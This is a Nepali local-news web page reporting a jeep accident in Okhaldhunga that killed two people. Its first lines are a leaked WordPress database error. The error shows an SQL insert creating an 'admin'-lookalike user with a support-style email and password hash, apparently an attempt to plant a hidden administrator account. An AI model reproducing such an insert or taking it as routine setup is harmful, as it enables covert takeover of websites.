WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgSqPnog5mL6ftOUa1.NiKFsCBe9xA1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:15:23', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुबाट विराटनगर जाँदै गरेको जिप हर्कपुरमा दुर्घटना दुइजनाको मृत्यु – Gaule Khabar

सोलुखुम्बुबाट विराटनगर जाँदै गरेको जिप हर्कपुरमा दुर्घटना दुइजनाको मृत्यु

सोलुखुम्बुबाट विराटनगर जाँदै गरेको जिप हर्कपुरमा दुर्घटना दुइजनाको मृत्यु

सोलुखुम्बुबाट विराटनगर जाँदै गरेको जिप ओखलढुंगाको हर्कपुरमा दुर्घटना भएको छ । बुधबार बिहान करिब ९ः३० बजे मानेभञ्ज्याङ गाउँपालिका– ६ भडारे खोलानजिकै दुर्घटना भएको थियो ।

जिपमा ९ जना सवार रहेकामा २ जनाको घटनास्थलमै मृत्यु भएको र अन्य घाइतेको उद्धारकार्य जारी रहेको जिल्ला प्रहरी प्रमुख प्रहरी नायव उपरीक्षक सुकदेव खनालले जानकारी दिए । घाइतेहरूको उदयपुरको घुर्मीस्थित स्वास्थ्य संस्थामा उपचार भइरहेको छ ।

गम्भीर घाइतेको हेलिकोप्टरबाट उद्धार गरेर काठमाडौं रेफर गर्ने तयारी भइरहेको छ । सवारी नम्बर, मृतक र घाइतेको पहिचान खुल्न बाँकी रहेको प्रहरीले जनाएको छ । सडकबाट झरेको जिप भिरमा अड्किएको छ

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका